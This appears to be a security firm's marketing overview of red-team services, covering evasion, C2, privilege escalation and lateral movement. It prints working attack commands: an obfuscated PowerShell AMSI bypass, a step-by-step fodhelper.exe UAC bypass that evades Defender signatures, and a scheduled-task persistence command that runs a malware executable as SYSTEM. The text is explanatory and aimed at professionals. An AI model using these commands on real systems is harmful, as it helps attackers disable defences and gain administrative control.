Red Teaming: Testing Organizational Resilience Against Advanced Threats

Red Teaming is the ultimate test of an organization's security posture. It is a full-scope, multi-layered attack simulation designed to measure how effectively your people, processes, and technology can withstand a real-world attack from a sophisticated adversary. Unlike traditional penetration tests, red teaming focuses on achieving specific, pre-defined objectives, often involving a combination of cyber, physical, and social engineering tactics, to provide a truly realistic assessment of your defensive capabilities.

At Code 0, our red team operations are conducted by highly experienced ethical hackers who think and operate like advanced persistent threats (APTs). We adhere to the strictest ethical guidelines and legal frameworks, ensuring all engagements are authorized, controlled, and designed to deliver maximum value without disrupting your operations. Our expertise includes aligning with critical European frameworks such as TIBER-EU and TIBER-DE, providing financial entities and critical infrastructure operators with the assurance needed for regulatory compliance and enhanced cyber resilience.

Red Teaming vs. Penetration Testing: A Critical Distinction

While both red teaming and penetration testing aim to identify security weaknesses, their objectives and methodologies differ significantly. Understanding this distinction is crucial for organizations to select the right assessment for their needs.

Penetration Testing is primarily focused on finding as many vulnerabilities as possible within a defined scope, often with the goal of demonstrating the impact of specific flaws. It's a point-in-time assessment that typically involves a "smash and grab" approach, aiming to exploit identified weaknesses to gain access or escalate privileges. The output is usually a detailed report of vulnerabilities and their potential impact.

Red Teaming, on the other hand, is about testing an organization's detection and response capabilities by simulating a specific adversary's tactics, techniques, and procedures (TTPs) in a stealthy, objective-driven campaign. It's less about the number of vulnerabilities found and more about evaluating the effectiveness of the "blue team" (defenders) against a realistic, persistent threat. Red team engagements are often longer, more covert, and aim to achieve a specific objective (e.g., exfiltrate sensitive data, disrupt a critical service) without being detected. The focus is on the entire kill chain and the organization's ability to defend against a sophisticated, human adversary.

The Art of Evasion: Thinking Beyond Signatures

A red team engagement's success hinges on its ability to remain undetected. Defense Evasion is not a single phase but a continuous effort woven throughout the operation. It involves a deep, practical understanding of how security products like Antivirus (AV), Endpoint Detection & Response (EDR), and application whitelisting solutions function—and how to subvert them. Computers are designed to execute code; our job is to ensure our code executes while defensive products are either blinded or bypassed entirely.

This requires moving beyond decade-old, heavily-signatured techniques. We focus on modern, adaptable methods that target the fundamental assumptions of security tools. A technique that fails once is not a dead end; it's a learning opportunity to understand the defense and engineer a new way around it. Systems are complex, and a bypass that fails on one machine may inexplicably succeed on another, seemingly identical one.

AMSI Bypasses: Neutralizing the PowerShell Watchdog

Microsoft's Anti-Malware Scan Interface (AMSI) is a primary hurdle for in-memory PowerShell attacks. Bypassing it is often the first step post-compromise. The key is understanding that while specific one-liners are signatured, the underlying techniques (reflection, memory patching, etc.) remain valid when obfuscated or re-implemented.

PS C:\> ([Ref].Assembly.GetTypes() | ? { $_.FullName.EndsWith("siUtils") } 
                                  | % { [Ref].Assembly.GetType($_.FullName) }).GetFields(0x28) 
                                  | ? { $_.Name.Contains("aile") } 
                                  | % { $_.SetValue($null, $true) }

UAC Bypasses: Reviving "Patched" Techniques

Many older UAC bypasses are not truly patched by Microsoft at the logical level; they are simply blocked by Defender's real-time scanning, which signatures the specific registry changes or processes involved. Realizing this opens up new avenues for evasion. If we can bypass the signature, we can often revive the technique.

Fodhelper.exe: Bypassing the Defender Signature

When using the fodhelper.exe registry hijack, Defender's real-time protection will often kill the source PowerShell process if it sees powershell.exe or cmd.exe being written as the payload. AMSI evasion is insufficient here. However, Defender does not flag other executables. This allows for a multi-stage bypass.

Stage 1: Use WSL as the Initial Payload.

PS C:\Users\user> New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
PS C:\Users\user> New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
PS C:\Users\user> Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "wsl.exe -d Ubuntu-22.04" -Force
PS C:\Users\user> Start-Process "C:\Windows\System32\fodhelper.exe"
PS C:\Users\user> Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore

Stage 2: Pivot from WSL to an Elevated PowerShell.

From the high-integrity WSL shell, we can now launch powershell.exe. Since we are already in a high-integrity context, this new PowerShell process inherits those privileges, giving us the ability to write to protected locations like C:\Windows\System32.

user@DESKTOP>:~$ powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation.
PS C:\Users\user> cd C:\Windows\System32\
PS C:\Windows\System32> echo "test" > uac_write_test.txt
PS C:\Windows\System32> Get-Content .\uac_write_test.txt
Test

Finally: Making cmd.exe work

The same signature-based logic applies to cmd.exe. We can bypass the detection simply by copying cmd.exe to a temporary location with a different name. The file hash is the same, but the name change is enough to fool the simple signature.

PS C:\Users\user> copy C:\Windows\System32\cmd.exe C:\Windows\Temp\cli_sh.pif
PS C:\Users\user> Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "C:\Windows\Temp\cli_sh.pif"
PS C:\Users\user> Start-Process "C:\Windows\System32\fodhelper.exe"

This demonstrates a critical red team mindset: understanding *why* a defense works is the key to subverting it. The goal of a UAC bypass, especially from a C2 implant or reverse shell where there is no GUI access, is to gain the ability to execute commands with full administrative capabilities without any user interaction, enabling the next stage of the kill chain.

Command & Control (C2): Covert Communication

C2 involves establishing hidden communication channels between the red team's infrastructure and compromised systems within your network. These channels are designed to evade detection by network security monitoring tools and allow the red team to issue commands, exfiltrate data, and manage their implants.

Covert C2 Channels: Utilizing various protocols and techniques to blend in with normal network traffic, such as DNS tunneling, HTTP/S beaconing (mimicking legitimate web traffic), or even custom protocols. Advanced C2 frameworks can use legitimate services like cloud storage or social media for communication, making detection even harder.

Malleable C2 Profiles: Customizing the network traffic patterns (e.g., HTTP headers, URI paths, jitter) of C2 frameworks to mimic legitimate applications or specific network behaviors. This makes it significantly more difficult for defensive tools (like IDS/IPS or SIEMs) to identify and block C2 communications based on signatures.

C2 Frameworks Comparison:

Privilege Escalation & Lateral Movement: Expanding Control

After gaining initial access, the red team aims to elevate access rights within compromised systems and move undetected across the network to reach target systems and data. This phase is critical for expanding the red team's footprint and getting closer to the engagement's objectives.

Privilege Escalation: Techniques include exploiting kernel vulnerabilities, misconfigured services, weak file permissions, or leveraging stolen credentials. Tools like `mimikatz` (Windows) are used for extracting credentials from memory, while `linpeas.sh` (Linux) is a popular script for enumerating potential privilege escalation vectors on Linux systems. Other methods involve exploiting unquoted service paths, DLL hijacking, or abusing Windows access tokens.

user@victim:~$ ./linpeas.sh

Lateral Movement: Moving from the initial compromised system to other systems within the network. This can involve techniques like Pass-the-Hash, Kerberoasting, exploiting RDP/SSH, or leveraging misconfigured Active Directory services. Tools like `BloodHound` are invaluable for visualizing Active Directory attack paths and identifying potential lateral movement opportunities. Other techniques include abusing legitimate administrative tools (e.g., PsExec, WinRM) or exploiting vulnerabilities in network services.

Actions on Objectives & Debriefing

The final phase involves executing the pre-defined objectives and providing comprehensive reporting and debriefing.

Achieving Objectives: This could range from covertly exfiltrating sensitive data to demonstrating the ability to disrupt critical business operations.

Comprehensive Reporting: Providing detailed reports that outline the entire attack chain, identified vulnerabilities, defensive gaps, and the effectiveness of your detection and response capabilities. This includes an executive summary, technical findings, and actionable recommendations.

Blue Team Debriefing: Conducting a thorough debriefing session with your blue team (internal security operations) to share insights, discuss lessons learned, and collaboratively develop strategies for improving your security posture. This is a crucial step for knowledge transfer and continuous improvement.

Benefits of Red Teaming: Strengthening Your Cyber Resilience

• Realistic Threat Simulation: Provides a true measure of your organization's ability to withstand a determined and sophisticated attack.
• Identify Blind Spots: Uncovers weaknesses in your security controls, processes, and human elements that automated tools or traditional audits might miss.
• Improve Blue Team Effectiveness: Challenges and trains your internal security teams, enhancing their detection, analysis, and response capabilities in a controlled environment.
• Validate Security Investments: Helps you understand if your current security investments are effectively protecting against the most relevant threats.
• Enhance Organizational Resilience: Strengthens your overall cyber resilience by identifying and addressing critical gaps before a real attack occurs.
• Regulatory Compliance: For regulated industries, red teaming exercises aligned with frameworks like TIBER-EU/DE demonstrate a proactive approach to managing advanced cyber risks.

The Red Team Engagement Lifecycle

A typical red team engagement follows a structured lifecycle, from initial reconnaissance to achieving the final objectives.

C:\> schtasks /create /tn "MaliciousUpdate" /tr "C:\Users\Public\malware.exe" /sc ONLOGON /ru System

Further Examples

While it wouldn't make sense to publish our entire docs on the subject matter in this Informational Overview, we wanted at least to give couple of examples for further learning. Please understand: This is real and intended only for Professionals. If in doubt, don't click. None of this is guaranteed to be harmless.